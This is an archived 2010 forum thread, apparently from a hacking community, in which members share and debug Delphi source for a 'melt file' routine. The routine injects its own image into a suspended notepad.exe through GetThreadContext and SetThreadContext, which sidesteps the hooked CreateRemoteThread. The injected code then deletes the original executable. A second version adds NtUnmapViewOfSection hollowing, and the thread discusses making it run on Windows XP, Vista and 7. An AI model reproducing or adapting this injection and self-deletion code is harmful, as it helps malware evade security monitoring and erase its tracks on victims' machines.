PDA

View Full Version : [SNIPPET] Melt File - Code Injection without CreateRemoteThread



cswi
09-14-2010, 02:03 PM
http://www.delphibasics.info/home/delphibasicssnippets/meltfile-codeinjectionwithoutcreateremotethread

This snippet uses GetThreadContext and SetThreadContext apis as a replacement for the often hooked CreateRemoteThread api. One disadvantage of this method is that the process should be suspended to safely perform the necessary process context operations.

Snippets here show you how to suspend and resume a process:
http://www.delphibasics.info/home/delphibasicssnippets/howtosuspendprocessresumeprocess

Author: steve10120
Compiled: Delphi 2007


program Inj;
// by steve10120
uses
Windows;

var
sBuff: array[0..255] of Char;

{$R *.res}

procedure MeltProc();
begin
Sleep(500);
DeleteFile(sBuff);
end;

function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
STARTINFO: TStartupInfo;
PROCINFO: TProcessInformation;
pFunc: Pointer;
dSize: DWORD;
pInjected: Pointer;
dWritten: DWORD;
CONTEXT: TContext;
hMod: THandle;
IDH: TImageDosHeader;
INH: TImageNtHeaders;
begin
FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
STARTINFO.cb := SizeOf(TStartupInfo);
if CreateProcess(nil, PChar(szProcessName), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
begin
hMod := GetModuleHandle(nil);
CopyMemory(@IDH, Pointer(hMod), 64);
if IDH.e_magic = IMAGE_DOS_SIGNATURE then
begin
CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
if INH.Signature = IMAGE_NT_SIGNATURE then
begin
dSize := INH.OptionalHeader.SizeOfImage;
pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
CONTEXT.ContextFlags := CONTEXT_FULL;
GetThreadContext(PROCINFO.hThread, CONTEXT);
CONTEXT.Eip := DWORD(pFunction);
SetThreadContext(PROCINFO.hThread, CONTEXT);
ResumeThread(PROCINFO.hThread);
end;
end;
end;
end;

procedure MeltFile();
begin
GetModuleFileName(0, sBuff, 256);
InjectCode('notepad.exe', @MeltProc);
end;

begin
MeltFile;
end.

steve10120
09-14-2010, 03:05 PM
You left out my credits. :(

cswi
09-14-2010, 03:37 PM
sorry. there were no credits where i found it :(

i have added them now.

since i am talking to the author, ;)
i get a DEP error, on Windows Vista... which OS has this been tested on?

Gakh
09-14-2010, 03:51 PM
Working on Win7 32bit

steve10120
09-14-2010, 04:09 PM
Worked fine on WinXP SP2 when I wrote it. As long as the page protection is set to PAGE_EXECUTE_READWRITE it should be fine. Just tried on Win7 x64 and it fails, fixed the context alignment but still fails, looks like a loader error.


program Test;

uses
Windows,
uGenUtils in 'uGenUtils.pas';

function NtUnmapViewOfSection(ProcessHandle:DWORD; BaseAddress:Pointer):DWORD; stdcall; external 'ntdll';

var
sBuff: array[0..255] of Char;

{$R *.res}

procedure MeltProc();
begin
Sleep(500);
DeleteFile(sBuff);
end;

function Align(dwValue:DWORD; dwAlign:DWORD):DWORD;
begin
if dwAlign <> 0 then
begin
if dwValue mod dwAlign <> 0 then
begin
Result := (dwValue + dwAlign) - (dwValue mod dwAlign);
Exit;
end;
end;
Result := dwValue;
end;

function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
STARTINFO: TStartupInfo;
PROCINFO: TProcessInformation;
pFunc: Pointer;
dSize: DWORD;
pInjected: Pointer;
dWritten: DWORD;
CONTEXT: PContext;
hMod: THandle;
IDH: TImageDosHeader;
INH: TImageNtHeaders;
begin
ZeroMemory(@STARTINFO, SizeOf(TStartupInfo));
STARTINFO.cb := SizeOf(TStartupInfo);
if CreateProcess(nil, PChar(szProcessName), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
begin
hMod := GetModuleHandle(nil);
CopyMemory(@IDH, Pointer(hMod), 64);
if IDH.e_magic = IMAGE_DOS_SIGNATURE then
begin
CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
if INH.Signature = IMAGE_NT_SIGNATURE then
begin
dSize := INH.OptionalHeader.SizeOfImage;
NtUnmapViewOfSection(PROCINFO.hProcess, Pointer(hMod));
pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
CONTEXT := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
DWORD(CONTEXT) := Align(DWORD(CONTEXT), 4);
CONTEXT^.ContextFlags := CONTEXT_FULL;
GetThreadContext(PROCINFO.hThread, CONTEXT^);
CONTEXT^.Eip := DWORD(pFunction);
SetThreadContext(PROCINFO.hThread, CONTEXT^);
ResumeThread(PROCINFO.hThread);
VirtualFree(CONTEXT, 0, MEM_RELEASE);
end;
end;
end;
end;

procedure MeltFile();
begin
GetModuleFileName(0, sBuff, 256);
InjectCode('Hello - Copy.exe', @MeltProc);
end;

begin
MeltFile;
end.

Protocol
09-14-2010, 04:15 PM
how did you come to the conclusion its a loader error?

steve10120
09-14-2010, 04:29 PM
http://i55.tinypic.com/15dkzdu.png

cswi
09-18-2010, 12:02 AM
http://www.hackhound.org/forum/index.php?topic=9478.0

i found your original post on hh and you wrote:
Credits: MS-Rem for the code injection

please could you link me to his article where he dicusses this code injection.
thank you.

lobe says to try rebasing it...
"Its an old dig, but try re-basing it."

steve10120
09-18-2010, 12:41 AM
Yeah thats right, MS-Rem made the injection. Code was found somewhere in here.

http://www.wasm.ru/author.php?author=Ms-Rem

cswi
09-18-2010, 02:44 AM
ya i found the example
testing now

edit: not working vista 32 bit.
i have to go to sleep now.
i will debug tomorow :)